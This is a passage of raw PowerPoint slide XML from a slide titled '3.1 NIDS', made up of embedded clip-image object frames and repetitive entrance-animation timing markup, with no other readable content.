                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="211" name="Object 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A89C81F-3D04-9B40-B107-7E3A1DF38328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6480320" y="4765445"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6380" name="Clip" r:id="rId37" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId37" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="211" name="Object 124">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A89C81F-3D04-9B40-B107-7E3A1DF383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320" y="4765445"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="212" name="Object 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E98B605-FA8B-1FA6-C5E7-DF4634480E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6480320" y="4536845"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6381" name="Clip" r:id="rId38" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId38" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="212" name="Object 125">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E98B605-FA8B-1FA6-C5E7-DF4634480E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320" y="4536845"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8828E928-6162-43F5-985D-7269DC4246D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.1 NIDS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p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14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1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="158"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="14" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="180"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="159"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="181"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="32" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="33" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="189"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="190"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="44" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="45" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="191"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="192"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="193"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="53" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="8000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="54" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="194"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="8500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="195"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="9000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="209"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="62" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="9500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="63" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="210"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="10000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="211"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="10500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="212"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="11000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="74" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="11500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="75" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="77" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="12000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="12500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="500">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="173"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
